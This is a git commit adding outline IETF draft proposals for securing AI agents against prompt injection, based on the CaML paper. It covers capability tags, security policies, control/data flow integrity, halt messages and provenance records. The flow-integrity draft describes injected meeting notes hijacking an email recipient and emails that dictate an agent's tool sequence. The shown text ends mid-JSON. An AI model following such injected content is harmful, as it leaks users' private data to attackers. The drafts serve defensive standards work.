feat: proposal intake pipeline with AI-powered generation on /proposals/new
Add full proposal system: DB schema (proposals + proposal_gaps tables), CLI `ietf intake` command, and web UI with Quick Generate on /proposals/new. The new page merges AI intake (paste URL/text → Haiku generates multiple proposals auto-linked to gaps) with manual form entry. Generated proposals are clickable cards that fill the editor below for refinement. Uses claude_model_cheap (Haiku) for cost-efficient web intake. Includes CaML-inspired draft proposals from arXiv:2503.18813 analysis. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
This commit is contained in:
79
data/reports/draft-proposals/camel-inspired/00-index.md
Normal file
79
data/reports/draft-proposals/camel-inspired/00-index.md
Normal file
@@ -0,0 +1,79 @@
|
||||
---
|
||||
title: "CaML-Inspired IETF Draft Proposals"
|
||||
source_paper: "Defeating Prompt Injections by Design (arXiv:2503.18813)"
|
||||
source_authors: "Debenedetti, Shumailov, Fan, Hayes, Carlini, Fabian, Kern, Shi, Terzis, Tramèr"
|
||||
date: 2026-03-09
|
||||
status: proposal
|
||||
---
|
||||
|
||||
# CaML-Inspired IETF Draft Proposals
|
||||
|
||||
Six IETF Internet-Draft proposals derived from [Defeating Prompt Injections by Design](https://arxiv.org/abs/2503.18813) (Google DeepMind / ETH Zurich, 2025), cross-referenced with the 12 identified gaps in the IETF AI agent standards landscape.
|
||||
|
||||
## Source Paper: CaML (CApabilities for MachinE Learning)
|
||||
|
||||
CaML proposes a **capability-based security layer** around LLM agents that defeats prompt injection attacks by design, not through model training. Key concepts:
|
||||
|
||||
- **Privileged/Quarantined LLM separation**: planning (trusted) vs. data processing (untrusted)
|
||||
- **Capability tags**: every data value carries provenance (source) and access control (allowed readers)
|
||||
- **Security policies**: Python-expressible per-tool policies checked before execution
|
||||
- **Data flow graph**: tracks dependencies between all variables across tool calls
|
||||
- **Control flow integrity**: prevents untrusted data from influencing execution plans
|
||||
- Evaluated on AgentDojo: 77% task success with **provable** security (vs. 84% undefended)
|
||||
|
||||
## Draft Overview
|
||||
|
||||
| # | Draft Name | Status | Primary Gaps | CaML Section |
|
||||
|---|-----------|--------|-------------|-------------|
|
||||
| 1 | [Capability-Based Security Policies](01-capability-security-policies.md) | outline | #86, #89, #93 | §5.2, §5.3 |
|
||||
| 2 | [Control/Data Flow Integrity](02-control-data-flow-integrity.md) | outline | #85, #88, #89 | §2, §5.4, §6.4 |
|
||||
| 3 | [Data Provenance Tracking Protocol](03-data-provenance-tracking.md) | outline | #84, #88, #93 | §5.3, §5.4 |
|
||||
| 4 | [Security Policy Federation](04-security-policy-federation.md) | outline | #83, #87, #90 | §5.2, §9.1 |
|
||||
| 5 | [Privileged/Quarantined Execution Model](05-privileged-quarantined-execution.md) | outline | #89, #92, #94 | §5.1 |
|
||||
| 6 | [Side-Channel Mitigation Framework](06-side-channel-mitigation.md) | outline | #89, #93 | §7 |
|
||||
|
||||
## Dependency Graph
|
||||
|
||||
```
|
||||
Draft 5 (Execution Model)
|
||||
└─► Draft 1 (Capabilities) ◄── foundational
|
||||
├─► Draft 2 (Flow Integrity)
|
||||
├─► Draft 3 (Provenance)
|
||||
└─► Draft 4 (Policy Federation)
|
||||
└─► Draft 6 (Side Channels) ◄── BCP document
|
||||
```
|
||||
|
||||
**Reading order**: 5 → 1 → 2/3 (parallel) → 4 → 6
|
||||
|
||||
## Gap Coverage Matrix
|
||||
|
||||
| Gap | Topic | Drafts |
|
||||
|-----|-------|--------|
|
||||
| #83 | Cross-org AI agent liability | 4 |
|
||||
| #84 | Real-time explainability | 3 |
|
||||
| #85 | Emergency shutdown coordination | 2 |
|
||||
| #86 | Resource consumption governance | 1 |
|
||||
| #87 | Cross-domain identity federation | 4 |
|
||||
| #88 | Decision audit trail interop | 2, 3 |
|
||||
| #89 | Adversarial agent detection | 1, 2, 5, 6 |
|
||||
| #90 | Capability negotiation protocols | 4 |
|
||||
| #91 | Decentralized model version control | — |
|
||||
| #92 | Ethical decision conflict resolution | 5 (partial) |
|
||||
| #93 | Privacy-preserving A2A communication | 1, 3, 6 |
|
||||
| #94 | Behavioral specification languages | 5 |
|
||||
|
||||
## Relationship to Existing Work
|
||||
|
||||
These drafts **build on** (not compete with) existing IETF work:
|
||||
|
||||
- **WIMSE** (Workload Identity in Multi-System Environments): identity + security context propagation → our capabilities extend this with data-level provenance
|
||||
- **ECT** (Execution Context Tokens): DAG-linked audit records → our provenance tracking is complementary
|
||||
- **MCP** (Model Context Protocol): tool interface standard → our security policies wrap around MCP tool calls
|
||||
- **A2A** (Agent-to-Agent): agent communication → our flow integrity applies to A2A message exchanges
|
||||
- **GNAP/OAuth**: authorization → our policy federation extends authz to data-flow-aware decisions
|
||||
|
||||
## Iteration Tracking
|
||||
|
||||
| Date | Change | Author |
|
||||
|------|--------|--------|
|
||||
| 2026-03-09 | Initial outlines for all 6 drafts | — |
|
||||
@@ -0,0 +1,216 @@
|
||||
---
|
||||
title: "Capability-Based Security Policies for AI Agent Tool Use"
|
||||
draft_name: draft-nennemann-ai-agent-capability-policies-00
|
||||
intended_wg: SECDISPATCH → new WG or WIMSE
|
||||
status: outline
|
||||
gaps_addressed: [86, 89, 93]
|
||||
camel_sections: [5.2, 5.3]
|
||||
date: 2026-03-09
|
||||
---
|
||||
|
||||
# Capability-Based Security Policies for AI Agent Tool Use
|
||||
|
||||
## 1. Problem Statement
|
||||
|
||||
AI agents interact with external tools (APIs, filesystems, messaging services) on behalf of users. Current agent frameworks allow any tool to receive any data, with no mechanism to restrict what an agent can do with a particular piece of information. This leads to:
|
||||
|
||||
- **Data exfiltration**: an agent tricked into sending private data to unauthorized recipients
|
||||
- **Resource abuse**: agents consuming unbounded computational, network, or API resources
|
||||
- **Privacy violations**: sensitive data flowing to tools that should never see it
|
||||
|
||||
CaML (Debenedetti et al., 2025) demonstrates that associating **capabilities** (provenance + access control metadata) with every data value, and checking **security policies** before each tool invocation, can provide provable security guarantees against prompt injection attacks — without modifying the underlying LLM.
|
||||
|
||||
No IETF standard currently defines how capabilities should be represented, propagated, or enforced in AI agent systems.
|
||||
|
||||
## 2. Scope
|
||||
|
||||
This document defines:
|
||||
|
||||
1. A **capability metadata schema** for tagging data values with provenance and access control
|
||||
2. A **security policy expression format** for defining per-tool invocation constraints
|
||||
3. A **policy enforcement protocol** for checking capabilities against policies before tool execution
|
||||
4. Integration points with existing authorization frameworks (OAuth 2.0, GNAP, WIMSE)
|
||||
|
||||
Out of scope:
|
||||
|
||||
- The internal architecture of the agent (Dual-LLM vs. single LLM)
|
||||
- Specific tool implementations
|
||||
- Model training or fine-tuning requirements
|
||||
|
||||
## 3. Key Concepts from CaML
|
||||
|
||||
### 3.1 Capabilities
|
||||
|
||||
From CaML §5.3: Capabilities are tags assigned to each value describing:
|
||||
|
||||
- **Sources**: where the data came from (user input, specific tool, LLM transformation)
|
||||
- **Readers**: who is allowed to access the data (public, specific users/email addresses, specific tools)
|
||||
|
||||
CaML's implementation tracks:
|
||||
- `User` provenance (literals from trusted user query)
|
||||
- `CaMeL` provenance (results of interpreter transformations)
|
||||
- Tool-specific provenance (identified by unique tool invocation ID)
|
||||
- Inner sources (e.g., the sender of an email retrieved by `read_email`)
|
||||
|
||||
### 3.2 Security Policies
|
||||
|
||||
From CaML §5.2: Security policies are functions that take a tool name and its arguments (with capability metadata) and return `Allowed` or `Denied`. Example (from CaML Figure 6):
|
||||
|
||||
```
|
||||
# Calendar event: title/description must be readable by participants,
|
||||
# OR all participants must come from user (trusted source)
|
||||
if is_trusted(participants):
|
||||
return Allowed()
|
||||
if not can_readers_read_value(participants_set, kwargs["title"]):
|
||||
return Denied("Title is not readable by participants")
|
||||
```
|
||||
|
||||
Policies can be:
|
||||
- **Global**: apply to all tools (e.g., "never send PII to external services")
|
||||
- **Per-tool**: specific to one tool (e.g., `send_email` requires recipient to be able to read body)
|
||||
- **Contextual**: depend on runtime state
|
||||
|
||||
## 4. Proposed Wire Format
|
||||
|
||||
### 4.1 Capability Metadata Object
|
||||
|
||||
```json
|
||||
{
|
||||
"cap:version": "1.0",
|
||||
"cap:value_id": "val-2f8a3c",
|
||||
"cap:sources": [
|
||||
{
|
||||
"type": "user",
|
||||
"trust_level": "trusted"
|
||||
},
|
||||
{
|
||||
"type": "tool",
|
||||
"tool_id": "read_email",
|
||||
"invocation_id": "inv-9d2e1f",
|
||||
"inner_source": "sender:bob@example.com"
|
||||
}
|
||||
],
|
||||
"cap:readers": {
|
||||
"type": "set",
|
||||
"members": ["user", "bob@example.com"]
|
||||
},
|
||||
"cap:transformations": [
|
||||
{
|
||||
"type": "llm_extraction",
|
||||
"model_role": "quarantined",
|
||||
"input_values": ["val-1a2b3c"],
|
||||
"timestamp": "2026-03-09T14:30:00Z"
|
||||
}
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
### 4.2 Security Policy Definition
|
||||
|
||||
```json
|
||||
{
|
||||
"policy:version": "1.0",
|
||||
"policy:id": "pol-send-email",
|
||||
"policy:tool": "send_email",
|
||||
"policy:rules": [
|
||||
{
|
||||
"description": "Recipient must come from user or be readable by all other param sources",
|
||||
"check": "sources_trusted_or_readers_match",
|
||||
"params": ["recipient"],
|
||||
"against": ["body", "subject", "attachments"]
|
||||
},
|
||||
{
|
||||
"description": "Attachments must be readable by recipient",
|
||||
"check": "readers_include",
|
||||
"params": ["attachments"],
|
||||
"must_include": "{{recipient}}"
|
||||
}
|
||||
],
|
||||
"policy:on_violation": "deny_with_user_prompt"
|
||||
}
|
||||
```
|
||||
|
||||
### 4.3 Policy Evaluation Result
|
||||
|
||||
```json
|
||||
{
|
||||
"result": "denied",
|
||||
"policy_id": "pol-send-email",
|
||||
"rule_index": 1,
|
||||
"reason": "Attachment 'confidential.txt' sources=[tool:cloud_storage] readers=[user, file_editors] — recipient 'attacker@evil.com' not in readers",
|
||||
"remediation": "user_approval_required"
|
||||
}
|
||||
```
|
||||
|
||||
## 5. Protocol Flow
|
||||
|
||||
```
|
||||
User Query
|
||||
│
|
||||
▼
|
||||
┌──────────────┐
|
||||
│ Agent Planner │ (Privileged — sees only user query)
|
||||
│ generates plan│
|
||||
└──────┬───────┘
|
||||
│ plan = [(tool₁, args₁), (tool₂, args₂), ...]
|
||||
▼
|
||||
┌──────────────────┐
|
||||
│ Capability Engine │ (Interpreter / orchestrator)
|
||||
│ │
|
||||
│ For each step: │
|
||||
│ 1. Execute tool │
|
||||
│ 2. Tag result │──► Capability metadata attached
|
||||
│ with caps │
|
||||
│ 3. Check policy │──► Policy evaluation
|
||||
│ before next │ ├─► Allowed → proceed
|
||||
│ tool call │ ├─► Denied → halt + explain
|
||||
│ 4. Propagate │ └─► User prompt → ask user
|
||||
│ caps through │
|
||||
│ transforms │
|
||||
└──────────────────┘
|
||||
```
|
||||
|
||||
## 6. Integration Points
|
||||
|
||||
### 6.1 With WIMSE / ECT
|
||||
|
||||
- Capability `sources` map to WIMSE workload identities
|
||||
- Policy evaluation results can be recorded as ECT claims
|
||||
- Trust domain boundaries in WIMSE correspond to capability reader boundaries
|
||||
|
||||
### 6.2 With MCP (Model Context Protocol)
|
||||
|
||||
- MCP tool definitions extended with `required_capabilities` field
|
||||
- MCP tool results extended with `capability_metadata` field
|
||||
- MCP servers can declare their security policies
|
||||
|
||||
### 6.3 With OAuth 2.0 / GNAP
|
||||
|
||||
- OAuth scopes are coarse-grained (per-API); capabilities are fine-grained (per-value)
|
||||
- Capability `readers` can reference OAuth client IDs or GNAP access tokens
|
||||
- Policy enforcement complements (not replaces) OAuth authorization
|
||||
|
||||
## 7. Security Considerations
|
||||
|
||||
- Capability metadata must be integrity-protected (signed) to prevent tampering
|
||||
- Policy definitions must come from a trusted source (the platform, not the agent)
|
||||
- Capability propagation through LLM transformations is inherently lossy — conservative defaults required
|
||||
- Side-channel leakage through policy denial patterns (see Draft 6)
|
||||
|
||||
## 8. Open Questions
|
||||
|
||||
1. **Granularity**: per-value capabilities (CaML) vs. per-message capabilities — performance tradeoff?
|
||||
2. **Composability**: how do capabilities compose when data from multiple sources is merged?
|
||||
3. **Delegation**: can an agent delegate capabilities to sub-agents?
|
||||
4. **Revocation**: how are capabilities revoked when trust relationships change?
|
||||
5. **Policy conflict resolution**: when multiple policies apply, which wins?
|
||||
|
||||
## 9. References
|
||||
|
||||
- Debenedetti et al. "Defeating Prompt Injections by Design." arXiv:2503.18813, 2025.
|
||||
- Needham & Walker. "The Cambridge CAP computer and its protection system." ACM SIGOPS, 1977.
|
||||
- Watson et al. "Capsicum: Practical Capabilities for UNIX." USENIX Security 10, 2010.
|
||||
- Watson et al. "CHERI: A hybrid capability-system architecture." IEEE S&P, 2015.
|
||||
- Morgan. "libcap: POSIX capabilities support for Linux." 2013.
|
||||
- draft-ietf-wimse-arch (WIMSE architecture)
|
||||
- draft-nennemann-wimse-ect (Execution Context Tokens)
|
||||
@@ -0,0 +1,258 @@
|
||||
---
|
||||
title: "Control Flow and Data Flow Integrity for Multi-Agent Systems"
|
||||
draft_name: draft-nennemann-ai-agent-flow-integrity-00
|
||||
intended_wg: SECDISPATCH → new WG
|
||||
status: outline
|
||||
gaps_addressed: [85, 88, 89]
|
||||
camel_sections: [2, 5.4, 6.4, 7]
|
||||
date: 2026-03-09
|
||||
---
|
||||
|
||||
# Control Flow and Data Flow Integrity for Multi-Agent Systems
|
||||
|
||||
## 1. Problem Statement
|
||||
|
||||
AI agent systems have two distinct attack surfaces that are often conflated:
|
||||
|
||||
1. **Control flow attacks**: an adversary changes *which* tools the agent calls or *in what order*
|
||||
2. **Data flow attacks**: an adversary changes *what data* is passed to tools, without altering the sequence of tool calls
|
||||
|
||||
CaML (Debenedetti et al., 2025) demonstrates that protecting only control flow (as the Dual-LLM pattern does) is insufficient. Even when an adversary cannot change the plan, they can manipulate the *data flowing through the plan* — analogous to SQL injection where the query structure is unchanged but parameters are manipulated.
|
||||
|
||||
In multi-agent systems, this problem is amplified: data flows across organizational boundaries, through multiple agent hops, and the distinction between control flow and data flow can blur entirely (CaML §6.4: "when data flow becomes control flow").
|
||||
|
||||
No IETF standard addresses control flow integrity or data flow integrity for AI agent systems.
|
||||
|
||||
## 2. Scope
|
||||
|
||||
This document defines:
|
||||
|
||||
1. **Control Flow Graph (CFG)** representation for agent execution plans
|
||||
2. **Data Flow Graph (DFG)** representation for tracking data dependencies
|
||||
3. **Integrity verification** mechanisms for both graphs
|
||||
4. **Emergency halt protocol** when integrity violations are detected
|
||||
5. **Interoperable audit format** for recording flow integrity events
|
||||
|
||||
## 3. Key Insights from CaML
|
||||
|
||||
### 3.1 The Dual Attack Surface
|
||||
|
||||
CaML §2 shows that agent actions have both a control flow and a data flow. Consider:
|
||||
|
||||
```
|
||||
1. Find meeting notes (control: tool selection)
|
||||
2. Extract email + doc name (data: from untrusted content)
|
||||
3. Fetch document by name (data: attacker-chosen filename)
|
||||
4. Send document to email (data: attacker-chosen recipient)
|
||||
```
|
||||
|
||||
A prompt injection in the meeting notes can change steps 2-4's *data* without changing the *plan*. The control flow is correct; the data flow is hijacked.
|
||||
|
||||
### 3.2 Data Flow Becomes Control Flow (§6.4)
|
||||
|
||||
CaML identifies a critical escalation: when an agent is instructed to "monitor emails and execute the action described in each email", the email content *becomes* the control flow. An attacker can send emails that dictate arbitrary tool sequences. This is analogous to **Return-Oriented Programming (ROP)** in traditional security.
|
||||
|
||||
### 3.3 Dependency Graph Tracking (§5.4)
|
||||
|
||||
CaML's interpreter maintains a complete dependency graph:
|
||||
|
||||
- For `c = a + b`, variable `c` depends on both `a` and `b`
|
||||
- For control flow (`if`/`for`), in STRICT mode, all statements in the block depend on the condition
|
||||
- This enables security policy checks: "does this tool argument transitively depend on untrusted data?"
|
||||
|
||||
## 4. Control Flow Graph Specification
|
||||
|
||||
### 4.1 CFG Representation
|
||||
|
||||
```json
|
||||
{
|
||||
"cfg:version": "1.0",
|
||||
"cfg:plan_id": "plan-4a7b2c",
|
||||
"cfg:origin": "privileged_planner",
|
||||
"cfg:steps": [
|
||||
{
|
||||
"step_id": "s1",
|
||||
"tool": "search_notes",
|
||||
"args_template": {"query": "meeting notes"},
|
||||
"successors": ["s2"],
|
||||
"trust_level": "privileged"
|
||||
},
|
||||
{
|
||||
"step_id": "s2",
|
||||
"tool": "extract_fields",
|
||||
"args_template": {"fields": ["email", "doc_name"]},
|
||||
"data_deps": ["s1.result"],
|
||||
"successors": ["s3", "s4"],
|
||||
"trust_level": "quarantined"
|
||||
}
|
||||
],
|
||||
"cfg:integrity": {
|
||||
"algorithm": "sha256",
|
||||
"signature": "...",
|
||||
"signer": "privileged_planner_id"
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### 4.2 CFG Integrity Properties
|
||||
|
||||
1. **Immutability**: once the plan is generated by a privileged planner, the step sequence cannot be altered by data processing
|
||||
2. **Signed origin**: the CFG must be signed by the trusted planner component
|
||||
3. **No dynamic expansion**: untrusted data cannot add new steps to the plan (prevents ROP-style attacks)
|
||||
|
||||
## 5. Data Flow Graph Specification
|
||||
|
||||
### 5.1 DFG Representation
|
||||
|
||||
```json
|
||||
{
|
||||
"dfg:version": "1.0",
|
||||
"dfg:plan_id": "plan-4a7b2c",
|
||||
"dfg:nodes": [
|
||||
{
|
||||
"node_id": "val-email",
|
||||
"produced_by": "s2",
|
||||
"depends_on": ["s1.result"],
|
||||
"trust_classification": "untrusted",
|
||||
"capability_ref": "cap-2f8a3c"
|
||||
},
|
||||
{
|
||||
"node_id": "val-doc",
|
||||
"produced_by": "s3",
|
||||
"depends_on": ["val-doc_name"],
|
||||
"trust_classification": "untrusted",
|
||||
"capability_ref": "cap-7e9d1f"
|
||||
}
|
||||
],
|
||||
"dfg:edges": [
|
||||
{"from": "s1.result", "to": "val-email", "type": "extraction"},
|
||||
{"from": "val-email", "to": "s4.args.recipient", "type": "argument_binding"}
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
### 5.2 DFG Integrity Properties
|
||||
|
||||
1. **Provenance tracking**: every value in the DFG carries its full dependency chain
|
||||
2. **Trust boundary marking**: values crossing from trusted to untrusted contexts are explicitly labeled
|
||||
3. **Taint propagation**: if any dependency is untrusted, the derived value is untrusted (conservative)
|
||||
4. **STRICT mode**: control flow conditions add dependencies to all values in their scope
|
||||
|
||||
## 6. Integrity Verification
|
||||
|
||||
### 6.1 Pre-Execution Checks
|
||||
|
||||
Before each tool invocation, the enforcement engine verifies:
|
||||
|
||||
1. The tool invocation matches the signed CFG (control flow integrity)
|
||||
2. All arguments' data flow paths are within policy bounds (data flow integrity)
|
||||
3. No untrusted data has been promoted to trusted without explicit user approval
|
||||
|
||||
### 6.2 Cross-Agent Flow Integrity
|
||||
|
||||
When agents communicate (e.g., via A2A protocol):
|
||||
|
||||
```
|
||||
Agent A (Org 1) Agent B (Org 2)
|
||||
┌─────────────┐ ┌─────────────┐
|
||||
│ Plan: s1→s2 │ ──message────► │ Plan: s3→s4 │
|
||||
│ DFG attached │ with DFG │ DFG merged │
|
||||
└─────────────┘ metadata └─────────────┘
|
||||
```
|
||||
|
||||
- Outbound messages carry DFG provenance metadata
|
||||
- Receiving agents extend (not replace) the DFG with new dependencies
|
||||
- Trust boundaries are preserved across agent hops
|
||||
|
||||
## 7. Emergency Halt Protocol
|
||||
|
||||
*Directly addresses Gap #85: Emergency shutdown coordination across agent networks.*
|
||||
|
||||
When a flow integrity violation is detected:
|
||||
|
||||
### 7.1 Violation Severity Levels
|
||||
|
||||
| Level | Condition | Action |
|
||||
|-------|-----------|--------|
|
||||
| `warning` | Untrusted data flowing to low-risk tool | Log + continue |
|
||||
| `halt` | Untrusted data flowing to state-changing tool | Block tool call + prompt user |
|
||||
| `emergency` | Data-flow-becomes-control-flow detected | Halt all agents in the plan + notify operators |
|
||||
| `cascade_stop` | Integrity violation in multi-agent pipeline | Propagate halt signal to all connected agents |
|
||||
|
||||
### 7.2 Cascade Halt Message
|
||||
|
||||
```json
|
||||
{
|
||||
"halt:version": "1.0",
|
||||
"halt:plan_id": "plan-4a7b2c",
|
||||
"halt:severity": "cascade_stop",
|
||||
"halt:trigger": {
|
||||
"step_id": "s4",
|
||||
"violation": "untrusted_data_as_control_flow",
|
||||
"evidence": {
|
||||
"tainted_value": "val-email-body",
|
||||
"became_control": "tool_selection"
|
||||
}
|
||||
},
|
||||
"halt:affected_agents": ["agent-a@org1", "agent-b@org2"],
|
||||
"halt:timestamp": "2026-03-09T14:35:22Z",
|
||||
"halt:preserve_state": true
|
||||
}
|
||||
```
|
||||
|
||||
### 7.3 Recovery
|
||||
|
||||
After an emergency halt:
|
||||
|
||||
1. All affected agents freeze execution state (no rollback by default)
|
||||
2. Human operators receive the full CFG + DFG with violation highlighted
|
||||
3. Operators can: approve (override), modify plan, or terminate
|
||||
4. State is preserved for forensic analysis
|
||||
|
||||
## 8. Audit Format for Flow Events
|
||||
|
||||
*Addresses Gap #88: Decision audit trail interoperability.*
|
||||
|
||||
Every flow integrity event is logged in a standardized format:
|
||||
|
||||
```json
|
||||
{
|
||||
"audit:event_type": "policy_check",
|
||||
"audit:plan_id": "plan-4a7b2c",
|
||||
"audit:step_id": "s4",
|
||||
"audit:tool": "send_email",
|
||||
"audit:cfg_valid": true,
|
||||
"audit:dfg_check": {
|
||||
"args_checked": ["recipient", "body", "subject"],
|
||||
"tainted_args": ["recipient"],
|
||||
"taint_chain": ["s1.result → s2.extract → val-email"],
|
||||
"policy_result": "denied"
|
||||
},
|
||||
"audit:timestamp": "2026-03-09T14:35:22Z",
|
||||
"audit:agent_id": "agent-a@org1"
|
||||
}
|
||||
```
|
||||
|
||||
Compatible with ECT (Execution Context Tokens) for DAG-linked audit chains.
|
||||
|
||||
## 9. Security Considerations
|
||||
|
||||
- CFG signatures must use strong cryptography (not just hashing)
|
||||
- DFG tracking has overhead proportional to plan complexity — bounded by maximum plan depth
|
||||
- STRICT mode (all statements in control flow blocks inherit condition's dependencies) is more secure but reduces utility
|
||||
- ROP-style attacks (composing allowed operations into malicious sequences) remain a risk even with flow integrity
|
||||
|
||||
## 10. Open Questions
|
||||
|
||||
1. **Dynamic plans**: some agents need to adapt plans based on intermediate results. How to maintain CFG integrity while allowing legitimate plan modification?
|
||||
2. **DFG size**: for long-running agents, the DFG can grow large. Pruning strategies?
|
||||
3. **Cross-protocol**: how does flow integrity metadata translate between MCP, A2A, and other protocols?
|
||||
4. **Performance**: real-time DFG tracking overhead in latency-sensitive applications?
|
||||
|
||||
## 11. References
|
||||
|
||||
- Debenedetti et al. "Defeating Prompt Injections by Design." arXiv:2503.18813, 2025.
|
||||
- Abadi et al. "Control-flow integrity principles, implementations, and applications." ACM TISSEC, 2009.
|
||||
- Denning & Denning. "Certification of programs for secure information flow." CACM, 1977.
|
||||
- Willison. "The Dual LLM pattern for building AI assistants." 2023.
|
||||
- Shacham. "The geometry of innocent flesh on the bone: ROP." ACM CCS, 2007.
|
||||
@@ -0,0 +1,268 @@
|
||||
---
|
||||
title: "Data Provenance Tracking Protocol for AI Agent Communications"
|
||||
draft_name: draft-nennemann-ai-agent-provenance-00
|
||||
intended_wg: SECDISPATCH or WIMSE
|
||||
status: outline
|
||||
gaps_addressed: [84, 88, 93]
|
||||
camel_sections: [5.3, 5.4]
|
||||
date: 2026-03-09
|
||||
---
|
||||
|
||||
# Data Provenance Tracking Protocol for AI Agent Communications
|
||||
|
||||
## 1. Problem Statement
|
||||
|
||||
When AI agents process data through multi-step tool-calling pipelines, the **origin and transformation history** of each piece of data is lost. This creates three critical problems:
|
||||
|
||||
1. **No explainability** (Gap #84): when an agent makes a decision, there is no standard way to trace *which data influenced it* and *where that data came from* in real time
|
||||
2. **Incompatible audit trails** (Gap #88): different agent platforms log decisions in incompatible formats, making cross-system forensics impossible
|
||||
3. **Privacy leakage** (Gap #93): without provenance tracking, agents cannot enforce data handling policies — private training data, user interactions, and proprietary algorithms may leak through tool calls
|
||||
|
||||
CaML demonstrates that tracking provenance at the **individual value level** (not just the message level) is both feasible and essential for security. Every variable in CaML's interpreter carries metadata about its sources and allowed readers.
|
||||
|
||||
## 2. Scope
|
||||
|
||||
This document defines:
|
||||
|
||||
1. A **provenance record format** for tracking data origin and transformation chains
|
||||
2. A **provenance propagation protocol** for maintaining provenance across agent boundaries
|
||||
3. A **provenance query interface** for real-time explainability
|
||||
4. **Privacy constraints** on provenance metadata itself
|
||||
|
||||
## 3. Provenance Model
|
||||
|
||||
### 3.1 Provenance Record
|
||||
|
||||
Every data value in an agent system carries a provenance record:
|
||||
|
||||
```json
|
||||
{
|
||||
"prov:id": "prov-8c3a2d",
|
||||
"prov:value_ref": "val-email-body",
|
||||
"prov:origin": {
|
||||
"type": "tool_output",
|
||||
"tool": "read_email",
|
||||
"invocation_id": "inv-4f2a1b",
|
||||
"agent_id": "agent-a@org1.example",
|
||||
"timestamp": "2026-03-09T14:30:00Z",
|
||||
"inner_sources": [
|
||||
{
|
||||
"type": "external_entity",
|
||||
"identifier": "sender:bob@example.com",
|
||||
"trust_level": "untrusted"
|
||||
}
|
||||
]
|
||||
},
|
||||
"prov:transformations": [
|
||||
{
|
||||
"type": "llm_extraction",
|
||||
"model_role": "quarantined",
|
||||
"operation": "extract_email_address",
|
||||
"input_provenance": ["prov-7b2a1c"],
|
||||
"timestamp": "2026-03-09T14:30:01Z"
|
||||
}
|
||||
],
|
||||
"prov:classification": {
|
||||
"trust_level": "untrusted",
|
||||
"sensitivity": "pii",
|
||||
"readers": ["user", "bob@example.com"]
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### 3.2 Origin Types
|
||||
|
||||
| Origin Type | Description | Trust Default |
|
||||
|-------------|-------------|---------------|
|
||||
| `user_input` | Directly from the authenticated user's query | trusted |
|
||||
| `tool_output` | Returned by a tool invocation | depends on tool |
|
||||
| `llm_generation` | Generated by an LLM (P-LLM or Q-LLM) | depends on role |
|
||||
| `literal` | Hardcoded in the execution plan | trusted |
|
||||
| `external_entity` | Inner source within tool data (e.g., email sender) | untrusted |
|
||||
| `derived` | Computed from other values | min(input trust levels) |
|
||||
|
||||
### 3.3 Transformation Types
|
||||
|
||||
| Transform Type | Description | Provenance Effect |
|
||||
|---------------|-------------|-------------------|
|
||||
| `llm_extraction` | Q-LLM parses unstructured → structured | inherits all input provenance |
|
||||
| `computation` | Deterministic operation (concat, filter) | union of input provenance |
|
||||
| `aggregation` | Multiple values combined | union of all input provenance |
|
||||
| `user_approval` | User explicitly approved a value | upgrades trust to "user_approved" |
|
||||
| `redaction` | Sensitive content removed | may upgrade trust classification |
|
||||
|
||||
## 4. Propagation Protocol
|
||||
|
||||
### 4.1 Intra-Agent Propagation
|
||||
|
||||
Within a single agent, the execution engine (interpreter) maintains provenance automatically:
|
||||
|
||||
```
|
||||
val_a = tool_1() → prov: {origin: tool_1}
|
||||
val_b = tool_2() → prov: {origin: tool_2}
|
||||
val_c = extract(val_a) → prov: {origin: tool_1, transform: extraction}
|
||||
val_d = combine(val_b, c) → prov: {origin: [tool_1, tool_2], transform: computation}
|
||||
```
|
||||
|
||||
**Rule**: derived values inherit the **union** of all input provenances and the **minimum** trust level.
|
||||
|
||||
### 4.2 Inter-Agent Propagation
|
||||
|
||||
When data crosses agent boundaries (via A2A, HTTP, message queues):
|
||||
|
||||
```
|
||||
Agent A Agent B
|
||||
┌──────────┐ ┌──────────┐
|
||||
│ val_d │ │ │
|
||||
│ prov: { │ ──── message ────► │ val_e │
|
||||
│ A's │ with provenance │ prov: { │
|
||||
│ chain │ header/metadata │ A's chain + │
|
||||
│ } │ │ hop record │
|
||||
└──────────┘ │ } │
|
||||
└──────────┘
|
||||
```
|
||||
|
||||
Provenance headers in inter-agent messages:
|
||||
|
||||
```http
|
||||
POST /agent-b/task HTTP/1.1
|
||||
Content-Type: application/json
|
||||
X-Agent-Provenance: eyJwcm92OmlkIjoicHJvdi04YzNhMmQi... (base64-encoded provenance chain)
|
||||
X-Agent-Provenance-Signature: <signed by agent A>
|
||||
```
|
||||
|
||||
Or as a structured field in A2A messages:
|
||||
|
||||
```json
|
||||
{
|
||||
"a2a:message": { ... },
|
||||
"a2a:provenance": {
|
||||
"chain": [ ... ],
|
||||
"hop": {
|
||||
"agent_id": "agent-a@org1.example",
|
||||
"timestamp": "2026-03-09T14:30:02Z",
|
||||
"attestation": "<signature>"
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### 4.3 Provenance Compaction
|
||||
|
||||
For long chains, provenance can be compacted:
|
||||
|
||||
1. **Hash chaining**: replace full chain with Merkle tree root + most recent N entries
|
||||
2. **Trust boundary summarization**: when crossing org boundaries, summarize internal provenance as a single attested record
|
||||
3. **TTL-based pruning**: provenance entries older than a configurable TTL are archived (reference retained, detail available on request)
|
||||
|
||||
## 5. Real-Time Provenance Query
|
||||
|
||||
*Directly addresses Gap #84: Real-time AI agent explainability protocols.*
|
||||
|
||||
### 5.1 Query Interface
|
||||
|
||||
Any participant (user, operator, peer agent) can query provenance:
|
||||
|
||||
```json
|
||||
{
|
||||
"query:type": "explain_value",
|
||||
"query:value_ref": "val-d",
|
||||
"query:depth": "full",
|
||||
"query:format": "graph"
|
||||
}
|
||||
```
|
||||
|
||||
Response:
|
||||
|
||||
```json
|
||||
{
|
||||
"explain:value_ref": "val-d",
|
||||
"explain:summary": "Email address extracted from meeting notes retrieved from cloud storage, combined with user-specified recipient name",
|
||||
"explain:graph": {
|
||||
"nodes": [
|
||||
{"id": "user_input", "trust": "trusted", "content_hint": "user query"},
|
||||
{"id": "tool_1:search_notes", "trust": "tool", "content_hint": "meeting notes"},
|
||||
{"id": "q_llm:extract", "trust": "untrusted", "content_hint": "extracted email"}
|
||||
],
|
||||
"edges": [
|
||||
{"from": "tool_1:search_notes", "to": "q_llm:extract"},
|
||||
{"from": "q_llm:extract", "to": "val-d"}
|
||||
